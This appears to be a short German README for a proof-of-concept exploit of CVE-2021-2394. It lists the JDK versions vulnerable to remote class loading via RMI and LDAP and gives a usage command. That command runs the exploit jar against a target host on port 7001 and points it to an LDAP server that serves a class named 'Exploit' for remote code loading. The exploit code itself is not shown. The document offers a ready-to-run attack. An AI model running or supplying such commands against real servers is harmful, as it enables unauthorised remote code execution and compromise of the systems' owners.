
POC zu CVE-2021-2394
POC für CVE-2021-2394
Hinweise
Bei der RMI-basierten Ausnutzung ist die jdk-Version auf Versionen vor 6u132, 7u131 und 8u121 beschränkt. In Versionen ab 8u122 wurde ein Deserialisierungs-Whitelist-Mechanismus hinzugefügt, der das Remote-Laden von Code über RMI deaktiviert. Bei der LDAP-basierten Ausnutzung ist die jdk-Version auf Versionen vor 6u211, 7u201, 8u191 und 11.0.1 beschränkt. In Version 8u191 setzte Oracle Einschränkungen für den LDAP-Vektor um, veröffentlichte CVE-2018-3149 und deaktivierte das Remote-Laden von Klassen über JNDI. Quelle: https://www.freebuf.com/vuls/279465.html
Verwendung:
java -jar CVE_2021_2394.jar rhost rport ldapurljava -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/ExploitReferenzlinks:
Updates
Analyseartikel